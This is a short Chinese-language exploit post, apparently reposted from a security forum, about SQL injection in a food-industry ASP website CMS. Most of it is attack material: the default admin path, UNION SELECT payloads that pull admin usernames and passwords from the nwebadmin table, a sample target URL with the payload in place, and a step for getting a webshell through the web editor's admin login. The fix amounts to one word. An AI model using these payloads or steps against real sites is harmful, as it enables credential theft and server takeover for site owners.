by Mr.DzY from www.0855.tv
这系统好像是在05年开发的。是不是原创作品,有待考证!改改用吧。。
地址: http://www.2cto.com/ym/201006/21198.html 默认后台:system/index.asp
EXP: union select 1,2,3,username,password,6,7,8,9,10,11,12 from nwebadmin union select 1,2,3,username,password,6,7,8,9,10,11,12,13 from nwebadmin
测试 : http://www.2cto.com /cms/shipin/NewsView. asp ?id=63 union select 1,2,3,username,password,6,7,8,9,10,11,12 from nwebadmin
拿shell:登陆后台 访问:webeditor/admin_login.asp
修复:过滤。。。但是还得注意cookies哦。
inurl:略
查看更多关于企成食品行业网站源码1.0 注入漏洞及修复 - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11463